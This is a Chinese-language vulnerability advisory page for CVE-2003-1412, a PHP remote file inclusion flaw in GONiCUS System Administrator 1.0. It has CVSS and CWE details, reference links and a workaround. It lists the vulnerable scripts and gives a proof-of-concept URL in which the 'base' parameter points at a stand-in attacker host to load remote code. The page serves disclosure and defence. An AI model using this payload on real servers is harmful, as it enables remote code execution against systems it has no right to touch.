CVE-2003-1412
CVSS6.8
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:52
NMCOE    

[原文]PHP remote file inclusion vulnerability in index.php for GONiCUS System Administrator (GOsa) 1.0 allows remote attackers to execute arbitrary PHP code via the plugin parameter to (1) 3fax/1blocklists/index.php; (2) 6departamentadmin/index.php, (3) 5terminals/index.php, (4) 4mailinglists/index.php, (5) 3departaments/index.php, and (6) 2groupd/index.php in 2administration/; or (7) the base parameter to include/help.php.


[CNNVD]GONiCUS System Administrator远程文件包含漏洞(CNNVD-200312-280)

        
        GOnicus System Administrator是一款基于PHP的管理LDAP数据库中的帐户/系统的工具。
        部分PHP脚本对用户提供的输入缺少充分过滤,远程攻击者可以利用这个漏洞包含远程服务器上的文件,以WEB进程权限执行恶意文件中的任意命令。
        下面的PHP脚本由于对包含文件的请求缺少正确检查,可以设置plugin变量来执行远程服务器上的任意文件:
        plugins/3fax/1blocklists/index.php
        plugins/2administration/6departamentadmin/index.php
        plugins/2administration/5terminals/index.php
        plugins/2administration/4mailinglists/index.php
        plugins/2administration/3departaments/index.php
        plugins/2administration/2groupd/index.php
        include/help.php文件也存在同样问题,可以提交恶意URI导致从攻击者服务器上装载包含恶意代码的include/common.inc文件,使文件中包含的恶意命令以WEB权限执行。如:
        http://target.server/include/help.php?base=http://attackers.server/
        

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1412
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1412
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-280
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/11408
(UNKNOWN)  XF  gosa-plugin-file-include(11408)
http://www.securityfocus.com/bid/6922
(UNKNOWN)  BID  6922
http://lists.grok.org.uk/pipermail/full-disclosure/2003-February/003932.html
(UNKNOWN)  FULLDISC  20030223 GOnicus System Administrator php injection
http://www.securitytracker.com/id?1006162
(UNKNOWN)  SECTRACK  1006162
http://www.securityfocus.com/archive/1/archive/1/313282/30/25760/threaded
(UNKNOWN)  BUGTRAQ  20030224 GOnicus System Administrator php injection
http://secunia.com/advisories/8120
(UNKNOWN)  SECUNIA  8120

- 漏洞信息

GONiCUS System Administrator远程文件包含漏洞
中危 输入验证
2003-12-31 00:00:00 2003-12-31 00:00:00
远程  
        
        GOnicus System Administrator是一款基于PHP的管理LDAP数据库中的帐户/系统的工具。
        部分PHP脚本对用户提供的输入缺少充分过滤,远程攻击者可以利用这个漏洞包含远程服务器上的文件,以WEB进程权限执行恶意文件中的任意命令。
        下面的PHP脚本由于对包含文件的请求缺少正确检查,可以设置plugin变量来执行远程服务器上的任意文件:
        plugins/3fax/1blocklists/index.php
        plugins/2administration/6departamentadmin/index.php
        plugins/2administration/5terminals/index.php
        plugins/2administration/4mailinglists/index.php
        plugins/2administration/3departaments/index.php
        plugins/2administration/2groupd/index.php
        include/help.php文件也存在同样问题,可以提交恶意URI导致从攻击者服务器上装载包含恶意代码的include/common.inc文件,使文件中包含的恶意命令以WEB权限执行。如:
        http://target.server/include/help.php?base=http://attackers.server/
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 对所有包含.php文件的子目录通过.htaccess进行访问限制。
        厂商补丁:
        GOnicus
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.gonicus.de/eng/index.html

- 漏洞信息 (22279)

GONiCUS System Administrator 1.0 Remote File Include Vulnerability (EDBID:22279)
php shellcode
2003-02-24 Verified
0 Karol Wiesek
N/A [点击下载]
source: http://www.securityfocus.com/bid/6922/info

GONiCUS System Administrator is prone to an issue that may allow remote attackers to include files located on remote servers. This issue is present in several PHP pages existing in the /plugins and /includes folders.

By crafting specific URI parameters it is possible for an attacker to influence the include path for these scripts to an external file on an attacker-controlled host. If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the vulnerable web server.

This vulnerability has been reported for GONiCUS System Administrator Version 1, previous versions may also be affected.

http://www.example.org/include/help.php?base=http://www.attacker.org/ 		

- 漏洞信息

51195
GOsa plugins/3fax/1blocklists/index.php plugin Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2003-02-24 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站